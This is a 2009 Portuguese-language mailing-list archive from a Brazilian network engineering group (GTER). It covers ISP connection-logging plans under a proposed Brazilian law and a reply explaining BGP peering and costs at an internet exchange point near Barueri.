References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com><4A4A0ED7.7090701@onda.psi.br><26A410474C334BCA9B62462933F841AF@atinet.com.br> <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> Message-ID: <7F7FBB63-9EBB-418F-B638-D6CB609010E8@gmail.com> PPPoE junto com freeradius guardando somente com qual ip e horario o cliente se logou e desconectou. Att Afranio Em 30/06/2009, ?s 12:51, Toledo, Luis Carlos escreveu: > > Desde 1994 existe uma lei nos USA chamada CALEA (Communications > Assistance > for Law Enforcement Act), que em um trecho diz "to make clear a > telecommunications carrier's duty to cooperate in the interception of > communications for Law Enforcement purposes, and for other purposes." > > Assim existe uma solu??o tamb?m chamada CALEA utilizada nos USA, que > permite > o armazenamento de certos logs de tr?fego. > > Creio que haver? a necessidade de algo do g?nero "CALEA" para > atendimento da > Lei Azeredo. > > Deixando claro que n?o estou fazendo nenhuma compara??o entre leis, > nem > dizendo que o CALEA atenda essa necessidade. > > Abs Toledo > >> >> Atribuir ip valido a todos e salvar os logs do radius ou DHCP >> durante o tempo previsto ? um come?o. O restante ainda n?o >> obtive aconselhamento jur?dico detalhado o suficiente para >> saber at? onde salvar. >> >> >> >> >>> -----Mensagem original----- >>> De: gter-bounces at eng.registro.br >> [mailto:gter-bounces at eng.registro.br] >>> Em nome de Edinilson - ATINET >>> Enviada em: ter?a-feira, 30 de junho de 2009 11:31 >>> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >>> Assunto: [GTER] Log das conexoes >>> Prioridade: Alta >>> >>> Caros amigos, como ? praticamente certeza que a Lei Azeredo ira >>> passar, como voces estao pretendendo gerar e armazenar os logs das >>> conexoes dos usuarios? >>> >>> Obrigado >>> >>> Edinilson >>> --------------------------------------------------------- >>> ATINET-Professional Web Hosting >>> Tel Voz: (0xx11) 4412-0876 >>> http://www.atinet.com.br >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From rubensk at gmail.com Tue Jun 30 23:06:59 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Tue, 30 Jun 2009 23:06:59 -0300 Subject: [GTER] =?iso-8859-1?q?Conex=E3o_PTT?= In-Reply-To: References: Message-ID: <6bb5f5b10906301906y79249efbg89ebfdde932f7ed2@mail.gmail.com> Wagner, Como voc? citou Barueri imagino que se refira ao Terremark. No Terremark os participantes por default fazem parte de um acordo m?ltiplo e tem apenas sess?es BGP com os 2 servidores de rotas; isso ? o mais simples de se fazer. Voc? pode se quiser pedir para n?o trocar rotas com peers espec?ficos; apenas algumas teles usam VLANs, mas essas em geral n?o querem trocar tr?fego com ningu?m mesmo. Quanto a custos, no Terremark h? custos em fun??o da velocidade da porta (10, 100, 1000 Mbps), independente de se tratar de tr?fego de peering ou contrata??o de tr?nsito. Rubens 2009/6/30 Wagner Furquim : > ? Boa Noite Pessoal, > > > ?Estou com uma d?vida, estamos com um projeto para comprarmos transporte de > dados at? um PTT em SP, algo perto de barueri. > > ? ?Atualmente j? trabalho com BGP, porem, fa?o peer com 1 operadora > somente, no caso quando eu cair em um PTT, como seria essa quest?o ??eu > tenho que fazer troca de trafego com todos que est?o no local?? ou existe > alguma coisa mais simples?? ja possui uma politica padr?o ou algo assim?? > n?o vai haver custos p/ trocar trafego nacional?? realmente sou leigo neste > assunto. > > > ? ? ?Agrade?o Antecipadamente, > > -- > Wagner A. Furquim Jr > CSCO10797322 > Cel: (18) 8121.4415 > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >